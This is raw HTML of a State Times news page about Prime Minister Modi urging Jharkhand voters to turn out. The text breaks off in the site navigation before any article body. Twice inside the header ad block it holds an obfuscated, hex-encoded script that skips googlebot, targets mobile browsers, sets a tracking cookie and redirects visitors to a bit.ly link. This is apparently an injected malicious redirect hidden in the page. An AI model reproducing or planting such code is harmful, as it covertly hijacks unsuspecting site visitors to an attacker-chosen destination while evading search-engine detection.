<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-GB"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang="en-GB"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang="en-GB"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-GB"> <!--<![endif]-->
    <head>
	<meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<title>PM urges people to vote in large numbers in Jharkhand | State Times</title>
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php">
<meta property="og:image" content="http://news.statetimes.in/wp-content/uploads/2019/08/PM-Modi-visits-Jaitleys-residence.jpg"/>
    <meta property="og:image:width" content="1024" />
    <meta property="og:image:height" content="1024" />

<meta property="og:title" content="PM urges people to vote in large numbers in Jharkhand"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="New Delhi: Prime Minister Narendra Modi on Saturday urged people of Jharkhand to turn out in large numbers and cast their vote in assembly polls to "enrich" democracy. Polling is underway in the first"/>
<meta property="og:url" content="http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/"/>
<meta property="og:site_name" content="State Times"/>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="shortcut icon" href="http://news.statetimes.in/wp-content/uploads/2014/08/favicon.png?x39047" />
<link rel="apple-touch-icon" href="http://news.statetimes.in/wp-content/themes/goodnews5/apple-touch-icon-precomposed.png?x39047" />

<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php" />
        <!--[if lt IE 9]>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/html5.js?x39047"></script>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/IE9.js?x39047"></script>
	<![endif]-->
	<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Feed" href="http://news.statetimes.in/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Comments Feed" href="http://news.statetimes.in/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; PM urges people to vote in large numbers in Jharkhand Comments Feed" href="http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/news.statetimes.in\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wp-block-library-css'  href='http://news.statetimes.in/wp-includes/css/dist/block-library/style.min.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/css/styles.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='chosen-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/chosen.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='wp-job-manager-frontend-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/frontend.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='plugins-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/plugins.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='main-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/main.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='responsive-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/media.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='style-css'  href='http://news.statetimes.in/wp-content/themes/child-theme/style.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='black-style-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/flamingo.css?x39047' type='text/css' media='all' />
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery-migrate.min.js?x39047'></script>
<link rel='https://api.w.org/' href='http://news.statetimes.in/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://news.statetimes.in/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://news.statetimes.in/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Cricket Association for Blind Jammu &#038; Kashmir will organised Inter State Cricket Series for the Blind on 2nd &#038;  3rd December 2019 at University of Jammu' href='http://news.statetimes.in/cricket-association-for-blind-jammu-kashmir-will-organised-inter-state-cricket-series-for-the-blind-on-2nd-3rd-december-2019-at-university-of-jammu/' />
<meta name="generator" content="WordPress 5.0.4" />
<link rel="canonical" href="http://news.statetimes.in/pm-urges-people-to-vote-in-large-numbers-in-jharkhand/" />
<link rel='shortlink' href='http://news.statetimes.in/?p=554515' />
<link rel="alternate" type="application/json+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fpm-urges-people-to-vote-in-large-numbers-in-jharkhand%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fpm-urges-people-to-vote-in-large-numbers-in-jharkhand%2F&#038;format=xml" />
<meta name="msvalidate.01" content="E16D694C0F66CFA1ABC9F98B3398A6E5" />
<script type="text/javascript" async defer
  src="https://apis.google.com/js/platform.js?publisherid=101378335416363517049">
</script>
<link href="https://plus.google.com/101378335416363517049" rel="publisher" />
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-3121650879019050",
          enable_page_level_ads: true
     });
</script>
<script type="text/javascript" src="//sdk.adspruce.com/1/adsprucetag.js?pid=2271&sid=1" defer></script>

<meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://news.statetimes.in/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?x39047" media="screen"><![endif]--><style type="text/css" title="dynamic-css" class="options-output">body{color:#282828;}{color:#262626;}.news-ticker{background-color:#262626;}.news-ticker li a, .news-ticker li{color:#ffffff;}</style><style type="text/css">
    
.header > .inner, .header .logo {
line-height: 112px;
height: 112px;
}
/* Category background */
</style>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>    </head>
    <body class="post-template-default single single-post postid-554515 single-format-standard both-sidebars-all both-sidebars singular both_sidebars_same_width fade-imgs-in-appear sticky_navigation_on navigation_highlight_ancestor time_in_twelve_format one-side-wide both-sidebars both-sides-true smooth_scroll_enable show_secondary_sidebar_on_ipad goodnews-child wpb-js-composer js-comp-ver-5.4.7 vc_responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage">
    
        <!--[if lt IE 7]>
            <p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
        <div class="boxed-wrap clearfix">
	    <div id="header-wrapper">
                         <div class="topbar">
  <div class="inner">
            <div class="top-left-content">
                 			     <ul id="menu-top-menu" class="top-nav mom_visibility_desktop"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li id="menu-item-69" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li id="menu-item-71" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li id="menu-item-4980" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li id="menu-item-4981" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li id="menu-item-57375" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>
     			     <div class="mom_visibility_device device-top-menu-wrap">
			      <div class="top-menu-holder"><i class="fa-icon-reorder mh-icon"></i></div>
			      <ul id="menu-top-menu-1" class="device-top-nav"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>			     </div>

                        </div> <!--tb left-->
        <div class="top-right-content">
            		    <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>
                    </div> <!--tb right-->
</div>
 </div> <!--topbar-->
             <header class="header " itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner">
                <div class="inner">
						                    <div class="logo">
					                    <a href="http://news.statetimes.in">
		                                                    <img src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" alt="State Times" width="445" height="77" />
                                                                                               <img class="mom_retina_logo" src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" width="445" height="77" alt="State Times" />
                                                		                    </a>

					
                    </div>
                                        <div class="header-right">
                                  		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-920 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-920 .mom-e3lanat-inner').boxSlider({
				autoScroll: true,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-920 .adr-next',
				prev: '.e3lanat-rotator-id-920 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-920" style="width:728px; height:90px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script>var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x62\x69\x74\x2e\x6c\x79\x2f\x32\x4c\x4c\x33\x41\x4f\x58","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script>	
</div>	</div><!--mom ad-->
					<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script>var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x62\x69\x74\x2e\x6c\x79\x2f\x32\x4c\x4c\x33\x41\x4f\x58","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script>	
</div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                    </div> <!--header right-->
                    
                <div class="clear"></div>
                </div>
            </header>
	    	    </div> <!--header wrap-->
                                    <nav id="navigation" itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" role="navigation" class="dd-effect-slide ">
                <div class="navigation-inner">
                <div class="inner">
                                                                <ul id="menu-primary-two" class="main-menu mom_visibility_desktop"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58091' data-id='15' data-object='category' data-layout=''><ul id='mn-ul-latest-58091'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/kotwal-reviews-functioning-of-revenue-deptt-progress-on-dilrmp/' title='Kotwal reviews functioning of Revenue Deptt, progress on DILRMP'><img src='http://news.statetimes.in/wp-content/uploads/2019/11/Financial-Commissioner-Revenue-Dr.-Pawan-Kotwal-29.jpg?x39047' alt='Kotwal reviews functioning of Revenue Deptt, progress on DILRMP' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/kotwal-reviews-functioning-of-revenue-deptt-progress-on-dilrmp/' title='Kotwal reviews functioning of Revenue Deptt, progress on DILRMP'> Kotwal reviews functioning of Revenue Deptt, progress on DILRMP</a><span> - 11 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/cake-mixing-ceremony-held-at-asia-hotel/' title='Cake mixing ceremony held at Asia Hotel'><img src='http://news.statetimes.in/wp-content/uploads/2019/11/age-old-ceremony-of-cake-mixing-on-the-eve-chirtmas-at-hotel-asia-2.jpg?x39047' alt='Cake mixing ceremony held at Asia Hotel' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/cake-mixing-ceremony-held-at-asia-hotel/' title='Cake mixing ceremony held at Asia Hotel'> Cake mixing ceremony held at Asia Hotel</a><span> - 11 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/sarpanchs-panchs-exposed-hollow-claims-of-development-cong/' title='Sarpanchs, Panchs exposed hollow claims of development: Cong'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='Sarpanchs, Panchs exposed hollow claims of development: Cong' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/sarpanchs-panchs-exposed-hollow-claims-of-development-cong/' title='Sarpanchs, Panchs exposed hollow claims of development: Cong'> Sarpanchs, Panchs exposed hollow claims of development: Cong</a><span> - 11 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/rana-invokes-societal-role-in-empowerment-of-differently-abled/' title='Rana invokes societal role in empowerment of differently-abled'><img src='http://news.statetimes.in/wp-content/uploads/2019/11/RANA-2.jpg?x39047' alt='Rana invokes societal role in empowerment of differently-abled' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/rana-invokes-societal-role-in-empowerment-of-differently-abled/' title='Rana invokes societal role in empowerment of differently-abled'> Rana invokes societal role in empowerment of differently-abled</a><span> - 11 hours ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/jknews/topjknews/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58083' data-id='16' data-object='category' data-layout=''><ul id='mn-ul-latest-58083'></ul><a href='http://news.statetimes.in/section/news/jknews/local-news/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58086' data-id='17' data-object='category' data-layout=''><ul id='mn-ul-latest-58086'></ul><a href='http://news.statetimes.in/section/news/jknews/jksports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58085' data-id='233' data-object='category' data-layout=''><ul id='mn-ul-latest-58085'></ul><a href='http://news.statetimes.in/section/news/jknews/crime-watch/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58084' data-id='1355' data-object='category' data-layout=''><ul id='mn-ul-latest-58084'></ul><a 